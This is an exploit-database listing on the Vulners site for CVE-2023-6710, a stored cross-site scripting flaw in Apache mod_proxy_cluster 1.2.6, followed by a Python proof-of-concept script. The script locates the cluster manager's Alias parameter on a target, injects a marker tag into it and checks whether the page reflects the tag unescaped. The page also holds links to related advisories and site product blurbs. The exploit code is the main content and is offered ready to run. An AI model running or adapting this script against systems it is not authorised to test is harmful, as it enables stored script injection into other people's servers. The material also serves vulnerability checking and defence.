Vulners
Lucene search
Apache mod_proxy_cluster 1.2.6 - Stored XSS
🗓️ 13 May 2024 00:00:00Reported by Mohamed Mounir BoudjemaType 
exploitdb🔗 www.exploit-db.com👁 204 Views
| Reporter | Title | Published | Views | Family All 33 |
|---|---|---|---|---|
 | Apache mod_proxy_cluster - Stored XSS Exploit | 13 May 202400:00 | – | zdt |
 | Exploit for Cross-site Scripting in Modcluster Mod_Proxy_Cluster | 25 Dec 202309:50 | – | githubexploit |
| Exploit for Cross-site Scripting in Modcluster Mod_Proxy_Cluster | 25 Dec 202309:40 | – | githubexploit |
 | Moderate: mod_jk and mod_proxy_cluster security update | 30 Apr 202400:00 | – | almalinux |
 | CVE-2023-6710 | 26 Dec 202308:54 | – | circl |
 | Apache httpd Cross-Site Scripting Vulnerability | 12 Dec 202300:00 | – | cnnvd |
 | CVE-2023-6710 | 12 Dec 202322:01 | – | cve |
 | CVE-2023-6710 Mod_cluster/mod_proxy_cluster: stored cross site scripting | 12 Dec 202322:01 | – | cvelist |
 | Security Bulletin: Multiple vulnerabilites in IBM Rational Build Forge. | 2 Apr 202413:12 | – | ibm |
 | mod_jk and mod_proxy_cluster security update | 2 May 202400:00 | – | oraclelinux |
10
import requests
import argparse
from bs4 import BeautifulSoup
from urllib.parse import urlparse, parse_qs, urlencode, urlunparse
from requests.exceptions import RequestException
class Colors:
RED = '\033[91m'
GREEN = '\033[1;49;92m'
RESET = '\033[0m'
def get_cluster_manager_url(base_url, path):
print(Colors.GREEN + f"Preparing the groundwork for the exploitation on {base_url}..." + Colors.RESET)
try:
response = requests.get(base_url + path)
response.raise_for_status()
except requests.exceptions.RequestException as e:
print(Colors.RED + f"Error: {e}" + Colors.RESET)
return None
print(Colors.GREEN + f"Starting exploit check on {base_url}..." + Colors.RESET)
if response.status_code == 200:
print(Colors.GREEN + f"Check executed successfully on {base_url}..." + Colors.RESET)
# Use BeautifulSoup to parse the HTML content
soup = BeautifulSoup(response.text, 'html.parser')
# Find all 'a' tags with 'href' attribute
all_links = soup.find_all('a', href=True)
# Search for the link containing the Alias parameter in the href attribute
cluster_manager_url = None
for link in all_links:
parsed_url = urlparse(link['href'])
query_params = parse_qs(parsed_url.query)
alias_value = query_params.get('Alias', [None])[0]
if alias_value:
print(Colors.GREEN + f"Alias value found" + Colors.RESET)
cluster_manager_url = link['href']
break
if cluster_manager_url:
print(Colors.GREEN + f"Preparing the injection on {base_url}..." + Colors.RESET)
return cluster_manager_url
else:
print(Colors.RED + f"Error: Alias value not found on {base_url}..." + Colors.RESET)
return None
print(Colors.RED + f"Error: Unable to get the initial step on {base_url}")
return None
def update_alias_value(url):
parsed_url = urlparse(url)
query_params = parse_qs(parsed_url.query, keep_blank_values=True)
query_params['Alias'] = ["<DedSec-47>"]
updated_url = urlunparse(parsed_url._replace(query=urlencode(query_params, doseq=True)))
print(Colors.GREEN + f"Injection executed successfully on {updated_url}" + Colors.RESET)
return updated_url
def check_response_for_value(url, check_value):
response = requests.get(url)
if check_value in response.text:
print(Colors.RED + "Website is vulnerable POC by :")
print(Colors.GREEN + """
____ _ ____ _ _ _____
| _ \ ___ __| / ___| ___ ___ | || |___ |
| | | |/ _ \/ _` \___ \ / _ \/ __| ____| || | / /
| |_| | __/ (_| |___) | __/ (_ |____|__ | / /
|____/ \___|\__,_|____/ \___|\___| |_|/_/
github.com/DedSec-47 """)
else:
print(Colors.GREEN + "Website is not vulnerable POC by :")
print(Colors.GREEN + """
____ _ ____ _ _ _____
| _ \ ___ __| / ___| ___ ___ | || |___ |
| | | |/ _ \/ _` \___ \ / _ \/ __| ____| || | / /
| |_| | __/ (_| |___) | __/ (_ |____|__ | / /
|____/ \___|\__,_|____/ \___|\___| |_|/_/
github.com/DedSec-47 """)
def main():
# Create a command-line argument parser
parser = argparse.ArgumentParser(description="python CVE-2023-6710.py -t https://example.com -u /cluster-manager")
# Add a command-line argument for the target (-t/--target)
parser.add_argument('-t', '--target', help='Target domain (e.g., https://example.com)', required=True)
# Add a command-line argument for the URL path (-u/--url)
parser.add_argument('-u', '--url', help='URL path (e.g., /cluster-manager)', required=True)
# Parse the command-line arguments
args = parser.parse_args()
# Get the cluster manager URL from the specified website
cluster_manager_url = get_cluster_manager_url(args.target, args.url)
# Check if the cluster manager URL is found
if cluster_manager_url:
# Modify the URL by adding the cluster manager value
modified_url = args.target + cluster_manager_url
modified_url = update_alias_value(args.target + cluster_manager_url)
print(Colors.GREEN + "Check executed successfully" + Colors.RESET)
# Check the response for the value "<DedSec-47>"
check_response_for_value(modified_url, "<DedSec-47>")
if __name__ == "__main__":
main()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 May 2024 00:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 3.15.4
EPSS0.0107